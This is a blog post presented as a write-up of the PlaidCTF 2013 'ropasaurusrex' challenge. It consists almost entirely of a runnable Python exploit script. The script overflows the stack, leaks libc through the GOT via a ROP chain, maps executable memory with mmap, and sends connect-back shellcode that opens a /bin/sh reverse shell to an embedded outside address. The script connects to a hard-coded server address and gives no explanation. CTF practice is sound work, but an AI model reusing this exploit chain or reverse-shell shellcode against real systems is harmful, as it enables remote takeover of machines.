plaid ctf 2013 ropasaurusrex writeup


#!/usr/bin/env python

from struct import *
from socket import *


pop11ret = 0x080484B2
pop4ret = 0x080484B5
read = 0x0804832C
vuln_again = 0x80483f4
write = 0x804830C
got_start = 0x8049610
got_end = 0x804961C


Shellcode ="\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b" +
    "\x5e\x68\x73\x15\x75\xde\x66\x68\x17\x71\x66\x53\x6a\x10\x51\x50" +
    "\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80" +
    "\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" +
    "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

WADDR = 0x13370000
W_FD = 1
R_FD = 0

#write
leak_libc = pack("<I",write)
leak_libc += pack("<I",pop4ret)
leak_libc += pack("<I",W_FD)
leak_libc += pack("<I",got_start)
leak_libc += pack("<I",got_end-got_start)
leak_libc += "AAAA"

# vuln  again
leak_libc += pack("<I", vuln_again)

f = socket(AF_INET, SOCK_STREAM)
f.connect(("54.234.151.114", 1025))

stage1 = "A"*140 + leak_libc + "A"*(253-140-len(leak_libc))
f.send(stage1)

# get libc base address
data = f.recv(4096)
libc_addr =  long(hex(unpack("<I",data[4:8])[0]),16) - 0xBF190
mmap_addr = libc_addr + 0xCA7B0

#mmap
stage2 = pack("<I", mmap_addr)
stage2 += pack("<I", pop11ret)
stage2 += pack("<I", WADDR)
stage2 += pack("<I", 4096)
stage2 += pack("<I", 7)
stage2 += pack("<I", 49)
stage2 += pack("<I", 0xffffffff)
stage2 += pack("<I", 0)
stage2 += "AAAA"
stage2 += "BBBB"
stage2 += "CCCC"
stage2 += "DDDD"
stage2 += "EEEE"

# read
stage2 += pack("<I", read)
stage2 += pack("<I", WADDR)
stage2 += pack("<I", R_FD)
stage2 += pack("<I", WADDR)
stage2 += pack("<I", 4096)


stage2_p = "A"*140 + stage2 + "A"*(256-140-len(stage2))

f.send(stage2_p)

f.send(Shellcode)


 

by codexb | 2013/04/22 09:47 | SeLinux | 트랙백

트랙백 주소 : http://leony.egloos.com/tb/5738600
☞ 내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]
※ 이 포스트는 더 이상 덧글을 남길 수 없습니다.

◀ 이전 페이지          다음 페이지 ▶